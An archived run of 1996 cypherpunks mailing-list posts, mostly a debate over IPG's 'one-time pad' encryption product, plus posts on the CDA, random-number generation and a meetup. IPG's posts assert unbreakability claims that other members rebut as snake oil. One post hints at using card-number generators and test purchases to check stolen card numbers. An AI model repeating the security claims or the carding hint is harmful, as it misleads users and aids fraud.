     shalt not ... Doooh" - Homer (Simpson, not the other one)
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Thu, 22 Feb 1996 07:26:04 +0800
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.OSF.3.91.960220234608.19136B-100000@nic.wat.hookup.net>
Message-ID: <Pine.BSD/.3.91.960221132344.3814A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim  - Thank you for your open mindess -  Perhaps you, Lucky and some of 
the others would like to know how the manufacturing process is done:

1. The OTPs are generated on a standalone diskette only system, no hard 
   disk, networking or anything else - they are generated in packets, 
   10 Nvelopes, or OTPs at a time - a however many packets will fit on a 
   diskette - currently 120 packets, but that may go down -  the 
   diskettes are not labelled,  or identifed in any way.

2. From there, they go to QC - we perform:

   A: Full autocorrelation to determine if there is any singing, 
      ringing, reverberation, RFI,  or other anomalies present -
      if so discarded, if not continued -

   B. Cross Correlation to determine the existence of staccatic noise 
       or discontinuities if any - if so discaarded - if not continued

   C. Bit, Character, and Couplet, Triplet tests for Standard Deviation, 
      Chi Square - Delta ICs (Deltas on incremental changes), First 
      Differences, Second Differences, and a repaeating sequnce test -) 
      These all must pass threshold tests. They are not perfect, to do so 
      would destroy randomness, but they must meet certain thresholds. 
      If they fail to pass  then they are discarded - if they pass -
      still no labels but-

   D. System Integration - if they are to be downloaded to a customer,    
      they are encrypted for that customer - off line on a network system 
      - but directly from diskette to encrypted form - no labels or 
      anything to identify the data sets. So now it resides off line in a 
      form that can be sent encrypted to the customer. This system does 
      allow decryption, only encryption.

   E. It is then loaded onto a Internet capable system and 
      transmitted to the customer - 

   F. If the system is is a first time delivery - a template is used to 
      design the system - number of users, user types - and the like - 
      the data is unlabelled - there is no way to determine what the data
      is. The system is still unlabelled at this point - but the system 
      size is noted from a manufacture order but no designation of who it 
      is to be sent to - it is then sent to shipping where labels from 
      shipping orders are finally assigned.

      Where during this process do employees have access to the dqta to 
      make copies or determine what the OTPs are?


      Furthermore: For those unsatisfied with the security set out 
                   above, as soon as we can get it set up properly, we 
                   will invite any customer who so desires to come to 
                   our facilities and  manufacture there own OTPs on 
                   their own computers - hard drives disconnectd - in 
                   a RFI and radiation shielded environment - they can 
                   manufacture six months supply, or a year or 
                   whatever - 

        Additionally, we will not - repeat will not comply with any 
        court order to supply copies to anyone - we will go to jail or be 
        shut down first and always -

There is a lot more, but that is a general rundown - 

Thank you again for yuour openmindness - we are sure that we cannot 
satisgfy anyone about the integrity of our security - our 
manufacturing employees - primarily middle aged women operators with 
little if any technical expertise - do not have any access to the OTPs.

Appreciatively,
Ralph 


Stubborness and stupidity are twins - Sophocles





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 22 Feb 1996 04:54:28 +0800
To: cypherpunks@toad.com
Subject: XON_rot
Message-ID: <199602211919.OAA05834@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Computerworld, February 19, 1996:

   Internet Privacy: How far should federal regulation go?

   "Only The Force of Law Can Deter Pornographers." by Sen.
   Jim Exon

      Don't let opponents of CDA fool you: Nothing in it
      applies to constitutionally protected speech between
      consenting adults. Opponents forsake reason when they
      say they want to protect children from indecency,
      seduction and harassment but maintain that the
      overriding issue is freedom of access to anything by
      anybody. There is too much of the self-serving
      philosophy of the hands-off elite.

   "The 'Net Doesn't Need Thought Police." by Marc Rotenberg

      The U.S. is getting drawn into this craziness because
      religious zealots and their allies in Congress have
      decided they know what is good for us and our children.
      CDA gives federal investigators the right to comb
      through Web sites, newsgroup posts and even private
      electronic mail to find evidence of indecent speech. The
      bill even threatens the right to use privacy
      technologies, such as encryption, because the government
      now will have the right to open private E-mail if it
      suspects the message contains offensive language.

   XON_rot

   [Thanks to BC for these]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Thu, 22 Feb 1996 07:40:23 +0800
To: Tim Philp <bplib@wat.hookup.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.OSF.3.91.960221001100.19136C-100000@nic.wat.hookup.net>
Message-ID: <Pine.BSD/.3.91.960221141844.3814B-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


We are reconsidering the Canadian restrictions - and may change them -
it is certainly not the ITAR quexstion, but another matter - we expect 
that Canadians will be included shortly - as to the question of using 
Cypherpunks - we are not saying taht we will not make changes based on 
any weaknesses that you discover, we will - but we do believe that if you 
fail to break the system with a spevfic time frame, that is fair game.

Why do you want to make it a one way street? We believe fair is fair - if 
you want to chop off our neck, then we should be able to tell people that 
you tried and could not at some point in time - 

Appreciatively,
Ralph 

There is no subject so old that something new cannot be said about it - 
Dostovesty - A Diary of a Writer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Thu, 22 Feb 1996 11:24:30 +0800
To: cypherpunks@toad.com
Subject: Re: "This is not Coderpunks--we don't need no steenking cryptography!"
In-Reply-To: <ad50b3ff09021004c04a@[205.199.118.202]>
Message-ID: <199602212227.OAA14459@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:

> So, if anyone asks "What does this have to do with cryptography?!?!,"
> point out to him that this is Cypherpunks, not Coderpunks!

This is a reasonable distinction, and it's certainly the interface
between cryptography and social/net/monetary/freedom issues where
I find cypherpunks valuable.

Your laundry list is amusing, and I think the IPG debunking
traffic is useful, but sooner or later there has to be
effectively an "end of story".

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 22 Feb 1996 05:54:52 +0800
To: cypherpunks@toad.com
Subject: Schneier Attacks
Message-ID: <199602211940.OAA07616@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Schneier says in a March SciAm brief on Kocher's timing
   attack: "In theory there are other attacks. You can measure
   power consumption or heat dissipation of a chip; timing is
   just one way."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 22 Feb 1996 20:02:01 +0800
To: Jerry Whiting <jwhiting@igc.apc.org>
Subject: Re: PRNG in VB
Message-ID: <199602212243.OAA13710@ix15.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:05 PM 2/20/96 -0800, you wrote:
>I am answering the courteous inquiry from Thomas Womack about my request for 
>help with a Visual Basic-only PRNG.  The premise is that those who will not or
>can not afford hardware-based RNG's need something relatively secure in the
>face of nothing at all or at best a lesser implementation.
...
>the getcurrenttime() Win API a lot.  Said to have 50 millicent increments.

The ViaCrypt PGP has a nice feature that pops up a window for you to wave your
mouse around in or type random characters if you'd rather.  It's _much_ nicer,
and generally faster, to wave the mouse.  If you need a few bits of
randomness when you're putting up the splash screen, you could also watch the 
mouse any time it's in your window on the way to the "ok" button,
though of course that doesn't help if your users are using the Enter or Esc key
instead of the mouse.


Of course, if you're trying to do crypto processing, you probably also feed
the data into MD5 before using any of it.

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com / billstewart@attmail.com +1-415-442-2215
# http://www.idiom.com/~wcs     Pager +1-408-787-1281

! Frank Zappa for President !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Thu, 22 Feb 1996 09:50:28 +0800
To: "Roy M. Silvernail" <roy@sendai.cybrspc.mn.org>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <k634NDvcwapi@sendai.cybrspc.mn.org>
Message-ID: <Pine.BSD/.3.91.960221145534.3814H-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


I find less and less disagreeement with your comments - with one major 
exception - for a given message length - say 10 to the 500th power, a 
OTP seeded algorithm, a better term would be to call it an OTP driven 
algorithm,  can produce the exact same effect as an OTP of that length - 
that is, the encrypted text can be any possible message of that length, 
and it is not possible to predict in way what the RNG generated stream
is - 

We can prove that to your or anyone eleses satisfaction - 
It obviously fails to do that somewhat short of infinity, but not short of 
what is  needed to prove system integrity for practical limits. If all 
the paricles in the Universe, 10 to the 80th, were Cray T3Es, and they 
had been calculating since the big bang, according to my rough 
calculations, it would still take over 10 to the 370th power years to 
just generate the message possibilities -for a 10 to the 500th power 
message length possibilities - we assert that if it can do that, and it 
can, it functions like a OTP of that length - and is unbreakable 

We also have a light, but only a slight disagreement, about whether the 
the key is truly symmetrical - we assert that because of the aprticlaur 
data feedback system employed it is not symmetrical, but that is entirely 
beside the point, we believe 10 to the 500th, or whatever should be 
sufficient 

Appreciatively, 

Ralph 














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Thu, 22 Feb 1996 09:08:50 +0800
To: Mike McNally <m5@dev.tivoli.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <9602211404.AA16345@alpha>
Message-ID: <Pine.BSD/.3.91.960221151319.3814I-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


Mike, the keys are encrypted with an OTP that only the intended recipient 
can open - a special, subsystem used for that purpose only - employing 
the same techniquers, but entirely separate and apart from the primary 
user system -  any inteceptor would have to break trhe system, which we 
claim is impossible.


On Wed, 21 Feb 1996, Mike McNally wrote:

> 
> IPG Sales writes:
>  > We do not keep copies, we would not be in business 30 days if 
>  > we did.
> 
> How do you ensure that the keys are not intercepted, duplicated by a
> man-in-the-middle, and forwarded?
> 
> ______c_____________________________________________________________________
> Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
>        m5@tivoli.com * m101@io.com          * I want more, I want more ...
>       <URL:http://www.io.com/~m101>         *_______________________________
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 22 Feb 1996 07:54:35 +0800
To: cypherpunks@toad.com
Subject: CPU_nks
Message-ID: <199602212018.PAA08790@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   SciAm, March, 1996

   "Privacy and Data Collection on the Net."

      There are still a few eccentric souls who gamely try to
      hold on to what lingering shreds of anonymity they
      possess. They never fill out questionnaires; they give
      their Social Security numbers only to their bank and to
      their broker. They encrypt their e-mail; they bypass the
      supermarket discount card that links identity to
      purchases; they pay cash for medical procedures they do
      not want known; and they wait patiently for e-cash to
      become a reality. Joining these hardy individualists are
      privacy advocates such as EPIC and Net groups like 
      cypherpunks which believe in untraceable communications 
      and in the technology needed to achieve it.

   CPU_nks












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@scranton.com>
Date: Thu, 22 Feb 1996 04:54:51 +0800
To: Jens Thiel <thielj@cs.bonn.edu>
Subject: Re: Credit card numbers
In-Reply-To: <312A4F73.12A8@cs.bonn.edu>
Message-ID: <Pine.LNX.3.91.960221151336.13150A-100000@mixolydian.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain


  Hi guys,
    Long time no post. Credit card numbers are determined by 
algorithmns.If s credit card number is no fitting to that algorithmn it 
is phoney. The only way that I know of to determine the validity of the 
card if a person has a copy of underground algorithmn generating software 
is to use the voice number and a store acct # for a purchase of say 
$50.00 or to go through the credit bureau.What I have wondered is if 
there is a way to determine a experation date from the credit card number.
                          Bye
                               moroni








On Tue, 20 Feb 1996, Jens Thiel wrote:

> Is there something like a checksum attached to Credit Card
> Numbers. Or better: Is there a way to determine for a given
> number N if
>   -this _might_ be a valid number
>   -this can't be a valid number
> 
> Thanx,
> Jens.
> -- 
> mailto:thielj@cs.bonn.edu
> Fax: +49 228 747246
> http://www.Bonn.CityNet.DE/people/jens
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Thu, 22 Feb 1996 12:11:21 +0800
To: Arley Carter <ac@hawk.twinds.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.HPP.3.91.960221090314.24258B-100000@hawk.twinds.com>
Message-ID: <Pine.BSD/.3.91.960221151719.3814J-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


We fess up - we are pig farmers from TexasL, we never have been to 
these high fluting things you call schools, so we do not even 
know what you are talking about, much less anything about Cryptography.

On Wed, 21 Feb 1996, Arley Carter wrote:

> On Tue, 20 Feb 1996, IPG Sales wrote:
> 
> Fess up guys. You are either:
> 
> 1.  A team of undergrads or graduate students conducting an "exploit". 
> 2.  A Detweiller tentacle. Dr. FC ?
> 3.  The return of Alice D'nonymous ?
> 4.  The reason the coderpunks lists was started.
> 
> You've got to be ROTFL. 
> See my sig.
> 
> Arley Carter
> Tradewinds Technologies, Inc.
> email: ac@hawk.twinds.com
> www: http://www.twinds.com
> 
> "Trust me. This is a secure product. I'm from <insert your favorite 
> corporation or government agency>."
>  
Appreciately,

Ralph

> 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> >  
> >      
> > 
> > 
> > 
> >     
> > 
> > 
> > 
> > 
> > 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Thu, 22 Feb 1996 09:58:41 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602211501.KAA05974@homeport.org>
Message-ID: <Pine.BSD/.3.91.960221152430.3814K-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


I do not recall that I said that we would retain you - The question was 
asked about unbiased judges - we simply stated that we would agree to 
you, Derek, and Immcarth as Judges - As I recall, it was Derek who asked 
for the Algorithms employed for investigation by the Cypherpunks, as he 
referred to them as a loose knit organization - but if you prefer, we 
will call them a mailing list - running fakers like us out of business 
should be its own reward 

Please do as you choose - you too  seem to be skating - please put up or 
shutup - I do not mean to be rude, and apolgise, but everytime we agree 
to something, everyone wants more - 

Appreciatively, 
Ralph

The greater our knowledge increases, the greater our ignorance unfolds
- John F. Kennedy at Rice University







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 22 Feb 1996 08:31:58 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960221132344.3814A-100000@citrine.cyberstation.net>
Message-ID: <199602212043.PAA10048@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



IPG Sales writes:
> Stubborness and stupidity are twins - Sophocles

IPG is both stubborn and stupid. How appropriate.

Let me give you another quote. It is acually a long extract of a
document written by Phil Zimmermann. Read it.

    Beware of Snake Oil
    ===================
    
    When examining a cryptographic software package, the question always
    remains, why should you trust this product?  Even if you examined the
    source code yourself, not everyone has the cryptographic experience
    to judge the security.  Even if you are an experienced cryptographer,
    subtle weaknesses in the algorithms could still elude you. 
    
    When I was in college in the early seventies, I devised what I
    believed was a brilliant encryption scheme.  A simple pseudorandom
    number stream was added to the plaintext stream to create
    ciphertext.  This would seemingly thwart any frequency analysis of
    the ciphertext, and would be uncrackable even to the most resourceful
    Government intelligence agencies.  I felt so smug about my
    achievement.  So cock-sure.  
    
    Years later, I discovered this same scheme in several introductory
    cryptography texts and tutorial papers.  How nice.  Other
    cryptographers had thought of the same scheme.  Unfortunately, the
    scheme was presented as a simple homework assignment on how to use
    elementary cryptanalytic techniques to trivially crack it.  So much
    for my brilliant scheme.
    
    From this humbling experience I learned how easy it is to fall into a
    false sense of security when devising an encryption algorithm.  Most
    people don't realize how fiendishly difficult it is to devise an
    encryption algorithm that can withstand a prolonged and determined
    attack by a resourceful opponent.  Many mainstream software engineers
    have developed equally naive encryption schemes (often even the very
    same encryption scheme), and some of them have been incorporated into
    commercial encryption software packages and sold for good money to
    thousands of unsuspecting users. 
    
    This is like selling automotive seat belts that look good and feel
    good, but snap open in even the slowest crash test.  Depending on
    them may be worse than not wearing seat belts at all.  No one
    suspects they are bad until a real crash.  Depending on weak
    cryptographic software may cause you to unknowingly place sensitive
    information at risk.  You might not otherwise have done so if you had
    no cryptographic software at all.  Perhaps you may never even
    discover your data has been compromised.
    
    Sometimes commercial packages use the Federal Data Encryption
    Standard (DES), a fairly good conventional algorithm recommended by
    the Government for commercial use (but not for classified
    information, oddly enough-- hmmm).  There are several "modes of
    operation" the DES can use, some of them better than others.  The
    Government specifically recommends not using the weakest simplest
    mode for messages, the Electronic Codebook (ECB) mode.  But they do
    recommend the stronger and more complex Cipher Feedback (CFB) or
    Cipher Block Chaining (CBC) modes.  
    
    Unfortunately, most of the commercial encryption packages I've looked
    at use ECB mode.  When I've talked to the authors of a number of
    these implementations, they say they've never heard of CBC or CFB
    modes, and didn't know anything about the weaknesses of ECB mode. 
    The very fact that they haven't even learned enough cryptography to
    know these elementary concepts is not reassuring.  And they sometimes
    manage their DES keys in inappropriate or insecure ways.  Also, these
    same software packages often include a second faster encryption
    algorithm that can be used instead of the slower DES.  The author of
    the package often thinks his proprietary faster algorithm is as
    secure as the DES, but after questioning him I usually discover that
    it's just a variation of my own brilliant scheme from college days. 
    Or maybe he won't even reveal how his proprietary encryption scheme
    works, but assures me it's a brilliant scheme and I should trust it. 
    I'm sure he believes that his algorithm is brilliant, but how can I
    know that without seeing it?  
    
    In all fairness I must point out that in most cases these terribly
    weak products do not come from companies that specialize in
    cryptographic technology.
    
    Even the really good software packages, that use the DES in the
    correct modes of operation, still have problems.  Standard DES uses a
    56-bit key, which is too small by today's standards, and may now be
    easily broken by exhaustive key searches on special high-speed
    machines.  The DES has reached the end of its useful life, and so has
    any software package that relies on it.
    
    There is a company called AccessData (87 East 600 South, Orem, Utah
    84058, phone 1-800-658-5199) that sells a package for $185 that
    cracks the built-in encryption schemes used by WordPerfect, Lotus
    1-2-3, MS Excel, Symphony, Quattro Pro, Paradox, and MS Word 2.0.  It
    doesn't simply guess passwords-- it does real cryptanalysis.  Some
    people buy it when they forget their password for their own files. 
    Law enforcement agencies buy it too, so they can read files they
    seize.  I talked to Eric Thompson, the author, and he said his
    program only takes a split second to crack them, but he put in some
    delay loops to slow it down so it doesn't look so easy to the
    customer.  He also told me that the password encryption feature of
    PKZIP files can often be easily broken, and that his law enforcement
    customers already have that service regularly provided to them from
    another vendor. 
    
    In some ways, cryptography is like pharmaceuticals.  Its integrity
    may be absolutely crucial.  Bad penicillin looks the same as good
    penicillin.  You can tell if your spreadsheet software is wrong, but
    how do you tell if your cryptography package is weak?  The ciphertext
    produced by a weak encryption algorithm looks as good as ciphertext
    produced by a strong encryption algorithm.  There's a lot of snake
    oil out there.  A lot of quack cures.  Unlike the patent medicine
    hucksters of old, these software implementors usually don't even know
    their stuff is snake oil.  They may be good software engineers, but 
    they usually haven't even read any of the academic literature in
    cryptography.  But they think they can write good cryptographic
    software.  And why not?  After all, it seems intuitively easy to do
    so.  And their software seems to work okay.    
    
    Anyone who thinks they have devised an unbreakable encryption scheme
    either is an incredibly rare genius or is naive and inexperienced. 
    Unfortunately, I sometimes have to deal with would-be cryptographers
    who want to make "improvements" to PGP by adding encryption
    algorithms of their own design.
    
    I remember a conversation with Brian Snow, a highly placed senior
    cryptographer with the NSA.  He said he would never trust an
    encryption algorithm designed by someone who had not "earned their
    bones" by first spending a lot of time cracking codes.  That did make
    a lot of sense.  I observed that practically no one in the commercial
    world of cryptography qualified under this criterion.  "Yes", he said
    with a self assured smile, "And that makes our job at NSA so much
    easier."  A chilling thought.  I didn't qualify either.
    
    The Government has peddled snake oil too.  After World War II, the US
    sold German Enigma ciphering machines to third world governments.
    But they didn't tell them that the Allies cracked the Enigma code
    during the war, a fact that remained classified for many years.  Even
    today many Unix systems worldwide use the Enigma cipher for file
    encryption, in part because the Government has created legal
    obstacles against using better algorithms.  They even tried to
    prevent the initial publication of the RSA algorithm in 1977.  And
    they have squashed essentially all commercial efforts to develop
    effective secure telephones for the general public. 
    
    The principal job of the US Government's National Security Agency is
    to gather intelligence, principally by covertly tapping into people's
    private communications (see James Bamford's book, "The Puzzle
    Palace").  The NSA has amassed considerable skill and resources for
    cracking codes.  When people can't get good cryptography to protect
    themselves, it makes NSA's job much easier.  NSA also has the
    responsibility of approving and recommending encryption algorithms. 
    Some critics charge that this is a conflict of interest, like putting
    the fox in charge of guarding the hen house.  NSA has been pushing a
    conventional encryption algorithm that they designed, and they won't
    tell anybody how it works because that's classified.  They want
    others to trust it and use it.  But any cryptographer can tell you
    that a well-designed encryption algorithm does not have to be
    classified to remain secure.  Only the keys should need protection. 
    How does anyone else really know if NSA's classified algorithm is
    secure?  It's not that hard for NSA to design an encryption algorithm
    that only they can crack, if no one else can review the algorithm. 
    Are they deliberately selling snake oil? 
    
    There are three main factors that have undermined the quality of
    commercial cryptographic software in the US.  The first is the
    virtually universal lack of competence of implementors of commercial
    encryption software (although this is starting to change since the
    publication of PGP).  Every software engineer fancies himself a
    cryptographer, which has led to the proliferation of really bad
    crypto software.  The second is the NSA deliberately and
    systematically suppressing all the good commercial encryption
    technology, by legal intimidation and economic pressure.  Part of
    this pressure is brought to bear by stringent export controls on
    encryption software which, by the economics of software marketing,
    has the net effect of suppressing domestic encryption software.  The
    other principle method of suppression comes from the granting all the
    software patents for all the public key encryption algorithms to a
    single company, affording a single choke point to suppress the spread
    of this technology.  The net effect of all this is that before PGP
    was published, there was almost no highly secure general purpose
    encryption software available in the US.
    
    I'm not as certain about the security of PGP as I once was about my
    brilliant encryption software from college.  If I were, that would be
    a bad sign.  But I'm pretty sure that PGP does not contain any
    glaring weaknesses (although it may contain bugs).  The crypto
    algorithms were developed by people at high levels of civilian
    cryptographic academia, and have been individually subject to
    extensive peer review.  Source code is available to facilitate peer
    review of PGP and to help dispel the fears of some users.  It's
    reasonably well researched, and has been years in the making.  And I
    don't work for the NSA.  I hope it doesn't require too large a "leap
    of faith" to trust the security of PGP.
    
             -- Phil Zimmerman, in the PGP manual.


IPG Sales writes:
> 1. The OTPs are generated on a standalone diskette only system,

They are not One Time Pads. They are keys for a random number
generator. Your continued assertion that they are One Time Pads is
fraudulent. They are not one time pads by any definition ever
previously used.

Furthermore, as has been stated, it is completely unacceptable for
keys to be generated by third parties.

> 2. From there, they go to QC - we perform:

The QC you perform is irrelevant.

The system you sell is insecure in a practical sense, likely uses an
insecure PRNG, and uses names and makes claims that come very close to
being fraudlent. It is harder, not easier, to manage the keys from
your system that supposedly "eliminates key management", and you don't
even have any shame about the fact that you are ignorant of the field
you work in.

> Ralph 
    
Perry
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 22 Feb 1996 08:44:40 +0800
To: CYPHERPUNKS@toad.com
Subject: Edupage, 20 Feb 1996
Message-ID: <01I1HB2WG0DCAKTKDL@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@elanor.oit.unc.edu" 21-FEB-1996 11:56:31.71

>*****************************************************************
>Edupage, 20 February 1996.  Edupage, a summary of news items on information
>technology, is provided three times each week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>*****************************************************************

     As I recall, this is incorrect. Without a signature/physical presence,
it's the _merchant_ who is liable. Thus, a lack of (sufficient) encryption
is a problem for the merchant, who thus may decide to not sell products via
the Net - a loss for the consumer.

>CREDIT CARD SCARE TACTICS
>Sending your credit card information over the Internet is really no big
>deal, says Simson Garfinkel, author of a book on Pretty Good Privacy
>encryption software.  "The whole thing about encryption over the Internet is
>that it's not to protect the customer -- it's to protect the credit-card
>companies.  By law, if there is no signature, the customer is liable for
>nothing.  If there's a signature, they're liable for $50.  The reason the
>credit-card companies want cryptography is to limit their own liability.  It
>has nothing to do with protecting the consumer."  And although Netscape
>Navigator sends a stern message each time a user attempts to send
>information over the Web, Garfinkel labels the warning just another scare
>tactic:  "Netscape Navigator is printing those messages because they're
>trying to sell encrypted servers.  It's an ad.  It doesn't look like an ad,
>but it is."  (Tampa Tribune 19 Feb 96 B&F3)

Friendly policy:

>BANYAN SPONSORS E-MAIL SWITCHBOARD
>Banyan Systems is offering a new service on the Web -- a directory of e-mail
>addresses and other information for 93 million people and 11 million
>businesses worldwide.  Switchboard includes a feature similar to Caller ID,
>that alerts a listed person whenever someone asks for that person's address,
>and allows them to decide whether to allow that information to be given out.
>The service also features public key certificates for secure communications
>between users.  < http://www.switchboard.com >  (Information Week 12 Feb 96
>p24)

Sigh... why am I not surprised?

>EUROPE BACKS V-CHIP
>The European Parliament has followed the lead of the United States in
>supporting the use of Canadian-developed V-chip technology that allows
>parents to screen violent or adult content from their televisions.
>(Montreal Gazette 20 Feb 96 C7)

>Edupage is written by John Gehl (gehl@educom.edu) & Suzanne Douglas
>(douglas@educom.edu).  Voice:  404-371-1853, Fax: 404-371-8057.  

>*************************************************************** 
>EDUPAGE is what you've just finished reading.  To subscribe to Edupage:
>send a message to: listproc@educom.unc.edu and in the body of the
>message type: subscribe edupage Abraham Lincoln (assuming that your
>name is Abraham Lincoln;  if it's not, substitute your own name).  ...
>To cancel, send a message to: listproc@educom.unc.edu and in the body of
>the message type: unsubscribe edupage.   (Subscription problems?  Send mail
>to educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 22 Feb 1996 08:37:14 +0800
To: WlkngOwl@UNiX.asb.com
Subject: Re: NOT CRYPTO (Sort of): Fwd: OPPOSITION: AFA seeks to expand CDA
Message-ID: <01I1HB6C6F6GAKTKDL@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


     One wonders if anyone at the American Family Association is selling ISP
stock short? If so, and it could be found out, it would be kind of embarrasing
to them.
     -Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@sirius.infonex.com>
Date: Fri, 23 Feb 1996 08:58:23 +0800
To: cypherpunks@toad.com
Subject: San Diego CPunks Symposium
Message-ID: <199602212353.PAA21681@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, February 29 (we're lucky this was
a leap year...) 1996

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop" were we will get updates on Lance's new ISP, perhaps the
new Win32 mixmaster client, and other new goodies. As a special *BONUS* we
can also exchange keys, and discuss other topical subjects.

   Don't forget to bring your public key fingerprint (and two forms of ID).
If you can figure out how to get a PGP fingerprint on the back of a business
card, that would be cool.  

Place: The Mission Cafe & Coffee Shop
       3795 Mission Blvd. in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and Garnet.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New people, don't forget your fingerprint.

Drop me a note if you plan to attend.

   Adam, Esq.



--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|  My PGP key is available on my  |Unauthorized interception violates |
| home page: http://www.rosa.com  |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...                      |communications are preferred for   | 
|  (see home page for definition) |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 22 Feb 1996 16:29:01 +0800
